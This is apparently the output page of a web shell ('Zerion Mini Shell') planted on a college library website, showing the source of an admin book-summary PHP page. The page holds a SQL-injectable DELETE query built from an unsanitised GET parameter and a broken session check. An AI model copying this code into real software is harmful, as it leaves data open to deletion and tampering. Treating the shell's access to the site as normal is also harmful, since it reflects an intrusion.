ok

Mini Shell

Direktori : /home/ngwcolle/public_html/LIBRARY-NGWC/admin/
Upload File :
Current File : /home/ngwcolle/public_html/LIBRARY-NGWC/admin/book-summary.php

<?php session_start();
//DB conncetion
include_once('includes/config.php');
error_reporting(0);
//validating Session
if (strlen($_SESSION['aid']==0)) {
  header('location:logout.php');
  } else{

//Code for record deletion
if($_GET['teamid']){
$tid=$_GET['teamid'];
mysqli_query($con,"delete from tblteams where id ='$tid'");
echo "<script>alert('Data Deleted');</script>";
echo "<script>window.location.href='manage-teams.php'</script>";
          }
?>
<!DOCTYPE html>
<html lang="en">

<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">

    <title>Manage Book Summary</title>
    <link rel="icon" type="image/x-icon" href="../assets/favicon.ico" /> 
    <!-- Custom fonts for this template -->
    <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
    <link
        href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i"
        rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="css/sb-admin-2.min.css" rel="stylesheet">

    <!-- Custom styles for this page -->
    <link href="vendor/datatables/dataTables.bootstrap4.min.css" rel="stylesheet">

</head>

<body id="page-top">

    <!-- Page Wrapper -->
    <div id="wrapper">

        <!-- Sidebar -->
  <?php include_once('includes/sidebar.php');?>
        <!-- End of Sidebar -->

        <!-- Content Wrapper -->
        <div id="content-wrapper" class="d-flex flex-column">

            <!-- Main Content -->
            <div id="content">

                <!-- Topbar -->
<?php include_once('includes/topbar.php');?>
                <!-- End of Topbar -->

                <!-- Begin Page Content -->
                <div class="container-fluid">

                    <!-- Page Heading -->
                       <div class="d-sm-flex align-items-center justify-content-between mb-4">
                        <h1 class="h3 mb-0 text-gray-800">Book Summary</h1>
                
                    </div>
                        <!-- DataTales Example -->
                    <div class="card shadow mb-4">
                        <div class="card-header py-3">
                            <h6 class="m-0 py-2 font-weight-bold text-primary">All Books Summary</h6>
                            <a href="add-book.php" class="float-right mt-0 btn btn-success"><i class="fa fa-plus" aria-hidden="true"></i> Add New</a>
							<a href="add-oldbook.php" class="float-right mt-0 btn btn-danger mx-2"><i class="fa fa-plus" aria-hidden="true"></i> Add Old Books</a>
                        </div>
                        
                        <div class="card-body">
                        <div class="table-responsive">
                                <table class="table table-bordered" id="dataTable1" width="100%" cellspacing="0">
                                    <thead>
                                    <tr>
		<th rowspan="2">#</th>
    <th rowspan="2">Subject</th>
    <th rowspan="2">Total Books</th>
    <th colspan="4">Purchased</th>
    <th colspan="4">Specimen</th>
  </tr>
  <tr>
		<th>Total</th>
    <th>Issued</th>
    <th>Stock</th>
		<th>Balance</th>
		<th>Total</th>
    <th>Issued</th>
    <th>Stock</th>
		<th>Balance</th>
  </tr>
                                    </thead>
                                    <!-- <tfoot>
                                     <tr>
                                            <th>Sno.</th>
                                            <th>Name</th>
                                            <th>Mobile Number</th>
                                            <th>Location </th>
                                             <th>Message</th>
                                             <th>Reporting Time</th>
                                            <th>Action</th>
                                        </tr>
                                    </tfoot> -->
                                    <tbody>
<?php 

$sql="SELECT tbl_department.name,count(*) as total_count, count(if(booktype='N' OR booktype='O',1,null)) as Purchased, count(if(booktype='SP',1,null)) as Specimen, count(if(nocopies=0 and (booktype='N' OR booktype='O') ,1,null)) as Puchase_Issue, count(if(booktype='N' OR booktype='O',1,null))-count(if((booktype='N' OR booktype='O') and nocopies='0',1,null)) as Puchase_Stock, count(if(booktype='SP' and nocopies=0,1,null)) as Specimen_Issue, count(if(booktype='SP' and nocopies=1,1,null)) as Specimen_stock, count(if(booktype='N' OR booktype='O',1,null))-count(if((booktype='N' OR booktype='O') and nocopies=0,1,null)) as balance_purchase, count(if(booktype='SP',1,null)) -count(if(booktype='SP' and nocopies=0,1,null)) as balance_specimen from tbl_book inner join tbl_department on tbl_book.subject=tbl_department.id GROUP by tbl_department.name";
	$result= mysqli_query($con,$sql) or die (mysqli_error());
$i=0;
$tc=$pur=$pi=$ps=$pbal=$sp=$spi=$sps=$spbal=0;
	while ($row= mysqli_fetch_array ($result) ){
$tc+=$row['total_count'];
$pur+=$row['Purchased'];
$pi+=$row['Puchase_Issue'];
$ps+=$row['Puchase_Stock'];
$pbal+=$row['balance_purchase'];
$sp+=$row['Specimen'];
$spi+=$row['Specimen_Issue'];
$sps+=$row['Specimen_stock'];
$spbal+=$row['balance_specimen'];
// $query=mysqli_query($con,"SELECT tbl_department.name,count(*) as total_count, count(if(booktype='N' OR booktype='O',1,null)) as Purchased, count(if(booktype='SP',1,null)) as Specimen, count(if(booktype='N' OR booktype='O' and nocopies=0,1,null)) as Puchase_Issue, count(if(booktype='N' OR booktype='O',1,null))-count(if(booktype='N' OR booktype='O' and nocopies=0,1,null)) as Puchase_Stock, count(if(booktype='SP' and nocopies=0,1,null)) as Specimen_Issue, count(if(booktype='SP' and nocopies=1,1,null)) as Specimen_stock, count(if(booktype='N' OR booktype='O',1,null))-count(if(booktype='N' OR booktype='O' and nocopies=0,1,null)) as balance_purchase, count(if(booktype='SP',1,null)) -count(if(booktype='SP' and nocopies=0,1,null)) as balance_specimen from tbl_book inner join tbl_department on tbl_book.subject=tbl_department.id GROUP by tbl_department.name;");
// $cnt=1;
// while($row=mysqli_fetch_array($query)){
?>
<tr>
		<td><?php echo ++$i;?></td>
    <td><?php echo $row['name']?></td>
    <td style="color:#079992;font-size:18px;"><?php echo $row['total_count']?></td>
		<td><?php echo $row['Purchased']?></td>
    <td><?php echo $row['Puchase_Issue']?></td>
    <td><?php echo $row['Purchased']-$row['Puchase_Issue']?></td>
		<?php
		if($row['balance_purchase']>10){?>
<td style="color:white;font-size:18px;background-color:#26de81;font-face:bold;"><?php echo $row['balance_purchase']?></td>
<?php	}
		else {?>
		<td style="color:white;font-size:18px;background-color:#d63031;"><?php echo $row['balance_purchase']?></td>
<?php
		}
    ?>
		<td><?php echo $row['Specimen']?></td>
    <td><?php echo $row['Specimen_Issue']?></td>
    <td><?php echo $row['Specimen_stock']?></td>
		<?php
		if($row['balance_specimen']>10){?>
<td style="color:green;font-size:18px;background-color:#26de81;"><?php echo $row['balance_specimen']?></td>
<?php	}
		else {?>
		<td style="color:white;font-size:18px;background-color:#d63031;"><?php echo $row['balance_specimen']?></td>
<?php
		}
		?>
<!-- <td style="color:green;font-size:18px;"></td> -->
  </tr>
<?php }?>


</tbody>
<tfoot style="color:#0984e3;font-size:18px;">
	<th colspan="2">Grand Total</th>

	<th><?php echo $tc;?></th>
	<th><?php echo $pur;?></th>
	<th><?php echo $pi;?></th>
	<th><?php echo $ps;?></th>
	<th><?php echo $pbal;?></th>
	<th><?php echo $sp;?></th>
	<th><?php echo $spi;?></th>
	<th><?php echo $sps;?></th>
	<th><?php echo $spbal;?></th>
</tfoot>
                                </table>
                            </div>
                        </div>
                    </div>

                </div>
                <!-- /.container-fluid -->

            </div>
            <!-- End of Main Content -->

            <!-- Footer -->
    <?php include_once('includes/footer.php');?>
            <!-- End of Footer -->

        </div>
        <!-- End of Content Wrapper -->

    </div>
    <!-- End of Page Wrapper -->

    <!-- Scroll to Top Button-->
    <?php include_once('includes/footer2.php');?>

    <!-- Bootstrap core JavaScript-->
    <script src="vendor/jquery/jquery.min.js"></script>
    <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

    <!-- Core plugin JavaScript-->
    <script src="vendor/jquery-easing/jquery.easing.min.js"></script>

    <!-- Custom scripts for all pages-->
    <script src="js/sb-admin-2.min.js"></script>

    <!-- Page level plugins -->
    <script src="vendor/datatables/jquery.dataTables.min.js"></script>
    <script src="vendor/datatables/dataTables.bootstrap4.min.js"></script>

    <!-- Page level custom scripts -->
    <script src="js/demo/datatables-demo.js"></script>
</body>
</html>
<?php } ?>
<script>
	
	
	$(document).ready(function() {
    $('#dataTable1').DataTable( {
		lengthMenu: [
            [50,100, -1],
            [50,100, 'All'],
        ],
      
    } );
} );
	</script>

Zerion Mini Shell 1.0